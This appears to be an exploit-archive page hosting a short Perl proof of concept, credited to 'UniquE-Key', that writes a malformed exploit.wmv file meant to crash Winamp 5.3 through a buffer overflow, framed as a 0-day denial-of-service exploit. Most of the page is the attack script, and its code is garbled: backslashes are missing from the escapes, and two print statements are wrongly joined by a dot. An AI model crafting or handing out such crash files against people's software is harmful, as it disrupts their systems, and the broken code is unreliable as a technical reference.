[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Winamp <= 5.3 (WMV File) Remote Denial of Service Exploit
# Published : 2007-04-19
# Author : WiLdBoY
# Previous Title : Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit
# Next Title : Ettercap-NG 0.7.3 Remote Denial of Service Exploit
#!/usr/bin/perl
# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------
# Type :
# Buffer Overflow - DOS
# Release Date :
# {2007-04-16}
# Product / Vendor :
# Winamp Media Player
# http://www.winamp.com/
# Exploit :
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
{
print "n-----------------------------------n";
print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)n";
print "-----------------------------------n";
print "nUniquE-Key{UniquE-Cracker}n";
print "UniquE[at]UniquE-Key.ORGn";
print "http://UniquE-Key.ORGn";
print "n-----------------------------------n";
print "nExploit Completed!n";
print "n-----------------------------------n";
}
open(wmv, ">./exploit.wmv");
print wmv "x00x00x00x06x00x00x00x00x00x00".
print wmv "x4Dx54x68x64";
close(wmv);
# Tested :
# --- WINAMP 5.3 Version ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# www.Syue.com [2007-04-19]